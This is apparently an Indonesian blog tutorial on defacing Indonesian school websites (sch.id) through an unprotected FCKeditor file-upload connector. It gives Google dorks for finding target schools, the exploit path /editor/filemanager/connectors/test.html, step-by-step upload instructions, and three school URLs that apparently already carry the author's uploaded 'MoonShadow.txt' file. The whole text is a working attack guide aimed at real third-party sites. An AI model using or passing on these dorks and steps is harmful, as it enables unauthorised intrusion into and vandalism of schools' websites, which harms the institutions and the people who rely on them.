Cara Deface Web Sekolah / Sch.id Dengan FCKeditor

          

Kita akan membicarakan soal deface lagi. Web sch.id merupakan web sekolahan milik Indonesia. Dengan menggunakan FCKeditor, kita bisa mengupload sebuah file ke web tersebut seperti halnya mengupload file deface, namun berformat txt. Ok, berikut caranya.



1. Buatlah sebuah file berformat txt dengan notepad, isi dengan kata - kata yang ingin diucapkan layaknya file deface, jangan lupa di save dan beri nama

2. Di pencarian google, masukkan dork berikut :
inurl:/html/siswa.php?
inurl:/html/alumni.php?
inurl:/html/guru.php?

3. Nanti bakalan muncul beberapa situs sekolahan, anda pilih salah satu untuk di eksekusi

4. Silahkan anda masukkan exploit ini /editor/filemanager/connectors/test.html
Contoh: www.site.com/editor/filemanager/connectors/test.html

5. Nanti akan terlihat seperti ini

Sesuai gambar, di kolom connector silahkan anda ganti dengan PHP. Resource type file

6. Klik "pilih file" dan pilih file txt yang sudah dibuat tadi

7. Klik "upload"

8. Jika berhasil akan muncul tulisan kira - kira seperti ini 'file uploaded with no error'

9. Untuk melihat file uploadnya, anda buka webnya dengan www.site.com/userfiles/file/namafilemu.txt

10. Jika berhasil maka nanti akan muncul text yang tadi anda buat di notepad.
Contoh: http://sman1gombong.sch.id/userfiles/file/MoonShadow.txt
http://www.sman1kotabaru.sch.id/userfiles/file/MoonShadow.txt
http://sman5smg.com/userfiles/file/MoonShadow.txt

Selesai, kini anda berhasil mendeface web tersebut, meski bukan pada indexnya